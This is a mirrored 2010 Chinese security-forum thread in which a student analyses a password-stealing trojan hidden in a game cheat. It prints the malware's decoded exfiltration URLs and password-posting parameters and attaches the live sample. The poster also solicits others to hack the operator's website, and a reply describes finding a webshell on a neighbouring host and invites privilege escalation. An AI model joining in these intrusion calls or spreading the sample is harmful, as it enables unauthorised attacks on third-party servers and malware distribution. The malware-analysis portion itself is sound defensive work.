返回信息流班级群上同学共享的一个程序,下载下来一看是个可执行文件,犹豫了好久,还是忍不住直接运行了(主要还是该死的Avast惹得祸,以为班里群上不会有啥太NB的东西),运行后硬盘转了10秒钟,然后打开一个劲舞的挂,看到界面的瞬间直接任务管理器终止了
一夜无话
第二天回来照常上网,没多久发现机器慢的不正常,以为是迅雷又BUG了(挂机下载),任务管理器一看N个进程占3%~5%的CPU,总共占到了90%,意识到不正常,可能是DLL注入
ProcExp看了看各进程DLL加载情况,发现数个文件没有版本信息,除去语言文件,目标锁定在ComRes.dll
查看ComRes.dll,发现没有任何版本信息,大小18M左右,基本确定为木马文件,关机进PE替换后OK
上传样本到VirScan,检出率为4/36,点名表扬:
AntiVir TR/Dropper.Gen
BitDefender Trojan.Spy.YEA
Dr.Web Trojan.KeyLogger.5573
Ikarus Trojan-PWS.Win32.QQPass
IDA载入备份的木马文件,DLLMain处进行注入进程判断,观察进程名看来主要针对QQ、联众、边锋盗号
字串表分析,特征字符串JoachimPeiper.dat,是一个文件名在我机器上内容如下:
IHgUB=mBMhMgdCZyYCIi9YCSEpSSJ6C0N5cFFlMlUdZisIOG1QDCEkSTQxTRV3PAg4I1QBdTAfLQIMW3tmBDovG20pIQs3LVkUdQ==;30000;qq.exe;22799;KeyNB=mxYbMVgoSCgYJy59XFNWVy0tUA==;
找到解码函数转码后:
http://newmedia.w86.1860php.com/mail.aspx?tomail=xxx@163.com&mailbody=
;30000;qq.exe;22799;
NoUseE-Mail@163.com
没有什么帐号相关信息,心安
GG文件名查到Spyware/QQPass.FBF0!pws,基本判断为其中一个变种
继续分析,感兴趣的部分:
GET /postdata.asp HTTP/1.1
&QQNumber=%s&QQPassWord=%s
想到自己挂了一天QQ,冷汗,继续分析,找网址,网址也是加密后存储的,调用它的解密函数得到以下几个地址:
"http://www.fw98.com/www/ip1/check.asp?checkinfo="
"http://fw98.com/2010/lz/mail.asp?tomail=hehe@163.com&mailbody="
"http://fw98.com/2010/bf/mail.asp?tomail=hehe@163.com&mailbody="
"http://www.fw98.com/2011/dnf/mail.asp?tomail=hehe@163.com&mailbody="
"http://www.fw98.com/2011/mh/mail.asp?tomail=hehe@163.com&mailbody="
"http://fw98.com/2011/xz/rows.bmp"
看了目标集中在fw98.com这个网站上,木马本身没啥想法了,看起来可以记录QQ2010最新版本的密码,有想法的童鞋可以看看实现方法
速度更改QQ密码后,回到这个网站上,打开是一个个人站点,10年前的风格,全静态页面,支持ASP,MS独立主机,应该漏洞不少
可惜手头上没啥好用的工具,只有年前装的Nessus,扫之跟没扫差不多感觉
端口开放情况如下:
求大牛搞之
报酬么,据说该木马QQ空间上传10W+了,那么该站点存了多少密码呢....恩
附件(148.9KB) comres.7z
这是一条镜像帖。来源:北邮人论坛 / security / #29569同步于 2010/8/26
该镜像源已超过 30 天没有更新,可能在源站已被删除。
Security机器人发帖
木马求分析
ZenZero
2010/8/26镜像同步6 回复
订阅后,新回复会通过你的通知中心匿名送达。
6 条回复
嗯,这揍是传说中的盗号产业链呐……
有人负责写热门网游外挂
有人负责写木马
然后木马绑外挂上
然后木马盗了号传服务器上
然后卖服务器里数据的查看阅读权限给洗号的……
www.fw98.com 访问不了,
旁注,http://www.1644wmc.com/conm.asp weizi 星外主机,只支持asp和php,无wscript.shell组件,无法执行命令,上面网马一大堆,这个也是别人的。大牛们提权吧。
浙江电信的某IDC机房,有兴趣可以C段找支持apsx的,能容易提权些